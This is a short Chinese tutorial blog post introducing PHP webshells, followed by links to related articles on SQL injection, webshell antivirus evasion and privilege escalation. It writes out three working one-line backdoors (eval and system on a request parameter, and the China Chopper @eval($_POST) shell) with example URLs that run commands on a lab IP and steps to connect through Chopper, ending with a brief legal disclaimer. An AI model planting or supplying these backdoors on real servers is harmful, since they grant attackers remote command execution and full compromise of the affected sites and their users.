32、webshell简介

简介: 32、webshell简介

webshell就是以asp、php、jsp或者cgi等网页文件形式存在的一种命令执行环境,也可以将其称做为一种网页后门。


一、eval,使用PHP函数,例如phpinfo()


1、把下面内容写入1.php文件

<?php eval($_REQUEST['cmd']);?>

2、访问该文件

http://192.168.152.128/1.php?cmd=phpinfo();

0a2653c851af460fa595bd959398a8f1.png

二、system,使用系统命令,例如:dir(win),ls(linux)


1、把下面内容写入1.php文件

<?php system($_REQUEST['cmd']);?>

2、访问该文件

http://192.168.152.128/1.php?cmd=dir;

0eacb84100b54626af849e6b562bf92a.png

三、菜刀一句话


1、把下面内容写入1.php文件

<?php @eval($_POST['abc']);?>

2、在菜刀添加该文件路径,点击添加

2d65d23f6d4748949b924e4057485923.png

3、双击网址进入

4cebaac233b3433da32a72337a77fc60.png

6de278e6d6694ce5bb08e7e842b7e74b.png

禁止非法,后果自负

目录
相关文章
|
7月前
|
SQL 数据库 Python
某站点存在SQL注入,直接可进行脱库(实战可参考此方法)
某站点存在SQL注入,直接可进行脱库(实战可参考此方法)
|
8月前
|
开发框架 安全 .NET
冰蝎WebShell免杀工具(支持4.0.6)
冰蝎WebShell免杀工具(支持4.0.6)
278 0
|
8月前
|
安全 关系型数据库 MySQL
黑吃黑Getshell到提权实战案例
黑吃黑Getshell到提权实战案例
221 0
|
8月前
|
运维 关系型数据库 MySQL
绕过360安全卫士提权实战案例
绕过360安全卫士提权实战案例
182 1
|
12月前
|
安全 PHP
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
pikachu靶场通过秘籍之PHP反序列化漏洞攻击
128 0
|
12月前
|
开发框架 安全 JavaScript
记一次web登录通杀渗透测试到GETSHELL——续篇
记一次web登录通杀渗透测试到GETSHELL——续篇
142 0
|
开发框架 Java .NET
32、webshell简介
32、webshell简介
95 0
32、webshell简介
|
开发框架 安全 JavaScript
某教程学习笔记(一):14、上传漏洞讲解
某教程学习笔记(一):14、上传漏洞讲解
78 0
某教程学习笔记(一):14、上传漏洞讲解
|
开发框架 安全 Java
某教程学习笔记(一):13、脚本木马原理
某教程学习笔记(一):13、脚本木马原理
77 0
某教程学习笔记(一):13、脚本木马原理
|
开发框架 安全 JavaScript
10 文件上传漏洞原理实战
文件上传漏洞是指攻击者上传了一个可执行的脚本文件,并通过此脚本文件获得了执行服务端命令的能力。该漏洞在业务应用系统中出现概率较高,究其原因是业务场景中上传附件、头像等功能非常常见,若在系统设计中忽略了相关的安全检查,则容易导致文件上传漏洞。
10 文件上传漏洞原理实战